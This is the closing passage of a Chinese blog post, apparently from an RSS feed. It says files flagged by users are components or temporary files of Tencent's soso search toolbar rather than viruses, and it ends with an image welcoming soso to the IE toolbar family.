&lt;P&gt;它们不是病毒，而是腾讯soso搜索工具条的组成部件或临时文件。从上报次数来看，腾讯搜索工具条正在迅速扩展用户。目前没有证据说明&lt;A href="http://www.baidu.com/s?wd=%CC%DA%D1%B6+soso+%C7%BF%D6%C6%B0%B2%D7%B0&amp;cl=3"&gt;腾讯强制用户安装这个工具条&lt;/A&gt;，想想数以亿计的QQ用户，这点上报数字也就没什么说不过去的了。&lt;/P&gt;
&lt;P&gt;最后，谨以下图欢迎soso加入IE工具条家族。&lt;/P&gt;
&lt;P&gt;&lt;IMG style="WIDTH: 555px; HEIGHT: 400px" height=400 alt="IE Toolbars" src="http://static.flickr.com/19/112803058_b377cdabf9_o.png" width=555&gt;&lt;/P&gt;&lt;!--AD_Link_Data_Begin--&gt;&lt;p align="center"&gt;&lt;span style="font-size: 0.8em"&gt;本篇文章使用&lt;a href="http://www.aigaogao.com/blogeditor/index.html" target="_blank"&gt;aigaogao&lt;/a&gt; Blog软件发布, &lt;a href="http://www.aigaogao.com/blogeditor/download.html" target="_blank"&gt;“我的Blog要备份”&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;!--AD_Link_Data_End--&gt;&lt;img src ="http://blog.donews.com/daishuo/aggbug/769869.aspx" width = "1" height = "1" /&gt;</description></item></channel></rss>